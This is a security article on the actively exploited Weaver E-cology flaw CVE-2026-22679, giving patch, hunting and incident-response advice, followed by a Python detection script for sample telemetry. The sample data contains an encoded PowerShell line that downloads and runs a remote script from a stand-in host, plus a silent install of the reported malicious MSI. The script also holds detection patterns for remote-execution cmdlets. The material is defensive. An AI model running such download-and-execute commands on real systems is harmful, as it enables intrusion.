A critical vulnerability in the Weaver E-cology office automation platform (tracked as CVE-2026-22679) has been actively exploited since mid-March to run discovery commands on compromised servers, according to a follow-up report published by the intelligence firm Vega. The root cause is an exposed debugging endpoint that passes unvalidated parameters to backend RPC functionality, which turns that interface into a remote, system-level command execution mechanism.
The picture Vega describes shows several attack phases: initial remote-execution checks (pings to callback hosts associated with the Goby tool), attempts to download payloads with obfuscated PowerShell, a failed deployment of a targeted MSI installer (fanwei0324.msi), and a fallback to fileless techniques that repeatedly fetched and executed remote scripts. Although in the documented cases endpoint defenses intervened and no persistence was established, the ability to run commands such as whoami, ipconfig or tasklist from Java processes without authentication makes the operational risk evident.

A critical detail of the timeline: the attacks began a few days after the vendor published an update (build 20260312) and before the vulnerability was widely disclosed, which highlights two lessons: first, that published updates are useless if they are not applied quickly; and second, that the availability of a patch does not stop actors from hunting for unpatched hosts by taking advantage of prior technical information or the exposure surface itself.
The vendor removed the debugging endpoint in the patched build, and the official recommendation is clear: update to the fixed version as soon as possible. The patch and the manufacturer's bulletin are on the Weaver page: Weaver security notice (build 20260312). The technical analysis and timeline published by the researchers are available in Vega's report: Vega analysis of CVE-2026-22679. For a prioritization framework and practices for responding to actively exploited vulnerabilities, see CISA's catalogue of exploited vulnerabilities: CISA KEV.
If your organization uses Weaver E-cology 10.0 or any version prior to 12 March 2026, the first mandatory action is to check the inventory and apply the corrected build immediately. Beyond the patch, it is essential to validate that the update was applied correctly and to look for indicators of compromise: review web server logs for requests to the old debugging endpoint, search for suspicious parameters in RPC requests, and look for events in which java.exe processes are the parent of cmd.exe, powershell.exe or other unexpected processes.

Practical detections should include searching for obfuscated PowerShell command lines, repeated calls to external domains or DNS/TCP beacons, and artifacts related to the reported malicious installer (e.g. references to fanwei0324.msi). In EDR environments, create rules that alert on child processes of the server's JVM (embedded Tomcat) that run system tools or that download and execute scripts from remote locations.
From an architectural point of view, this vulnerability is a reminder to implement preventive controls: restrict or remove debugging endpoints in production, apply the principle of least privilege to accounts and processes, segment networks to limit lateral movement, and subject critical endpoints to application control and egress filtering policies. If patching immediately is not possible, reduce exposure by restricting access to the vulnerable port or endpoint through access control lists, reverse proxies or a WAF, although the definitive fix is the official update.
Finally, if you detect signs of exploitation or have reason to believe that a host was reached, activate the incident response plan: contain the affected system, preserve logs and memory for forensic analysis, assess the need for complete remediation (reinstallation if compromise is confirmed), and notify stakeholders in accordance with applicable regulations. The absence of persistence in the documented cases does not guarantee that future attackers will not try to consolidate access; therefore, continuous monitoring and proactive hunting across the server estate are essential.
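As an added example (not code from the page, from Weaver or from Vega), the following Python script applies the detection guidance above to constructed sample telemetry: process-creation events in which the E-cology JVM spawns a shell or discovery tool, Base64-encoded PowerShell that fetches a remote script, references to the reported installer name, and web-server requests to the removed debugging endpoint. The endpoint path, file paths, IP addresses and timestamps are placeholders I made up; the page does not name the endpoint, so substitute the path from the vendor bulletin before using this against real logs.

```python
import base64
import re

# Constructed placeholder: the page does not name the removed debugging
# endpoint, so replace this with the path given in the Weaver bulletin.
DEBUG_ENDPOINT_PATH = "/PLACEHOLDER_DEBUG_ENDPOINT"

# JVM images that should not normally spawn shells on an E-cology server.
JVM_IMAGES = {"java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DISCOVERY_TOOLS = {"whoami.exe", "ipconfig.exe", "tasklist.exe"}
IOC_STRINGS = ("fanwei0324.msi",)  # installer name reported on the page

# -e/-enc/-EncodedCommand followed by a Base64 blob (PowerShell accepts prefixes).
ENCODED_RE = re.compile(
    r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# Cmdlets typically seen when a script is pulled from a remote location and run.
REMOTE_EXEC_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b",
    re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(command_line):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_process_event(event):
    """Return the list of detections that fire for one process-creation event."""
    findings = []
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    if parent in JVM_IMAGES and (image in SHELLS or image in DISCOVERY_TOOLS):
        findings.append("jvm-spawned-" + image)
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        findings.append("encoded-powershell")
        if REMOTE_EXEC_RE.search(decoded):
            findings.append("remote-script-execution")
    elif REMOTE_EXEC_RE.search(cmd):
        findings.append("remote-script-execution")
    for ioc in IOC_STRINGS:
        if ioc.lower() in cmd.lower():
            findings.append("ioc:" + ioc)
    return findings


def flag_web_requests(log_lines):
    """Return combined-format log lines whose request path is the old endpoint."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and match.group(1).split("?", 1)[0] == DEBUG_ENDPOINT_PATH:
            hits.append(line)
    return hits


# Constructed sample telemetry (not from the report). The encoded payload is
# built here so the example stays readable; real logs carry only the Base64.
_SAMPLE_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    .encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"parent_image": r"C:\APP\jdk\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _SAMPLE_ENCODED},
    {"parent_image": r"C:\APP\jdk\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"parent_image": r"C:\APP\jdk\bin\java.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Windows\Temp\fanwei0324.msi /qn"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

SAMPLE_WEB_LOG = [
    '10.0.0.5 - - [14/Mar/2026:10:01:02 +0000] "GET /PLACEHOLDER_DEBUG_ENDPOINT HTTP/1.1" 200 312',
    '10.0.0.7 - - [14/Mar/2026:10:01:05 +0000] "GET /login/Login.jsp HTTP/1.1" 200 5120',
]


def triage(events=SAMPLE_EVENTS, web_log=SAMPLE_WEB_LOG):
    """Map event index -> findings for events that fired, plus endpoint hits."""
    process_hits = {i: f for i, f in enumerate(map(classify_process_event, events)) if f}
    return {"process": process_hits, "web": flag_web_requests(web_log)}


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

The process rules are deliberately narrow (JVM parent plus shell or discovery child) so that they stay quiet on a healthy E-cology host; widen `DISCOVERY_TOOLS` and `IOC_STRINGS` with whatever your own incident data supports, and feed `flag_web_requests` the access log of the reverse proxy as well as the server, since a WAF or proxy in front of the endpoint may be the only place the original request path is still visible.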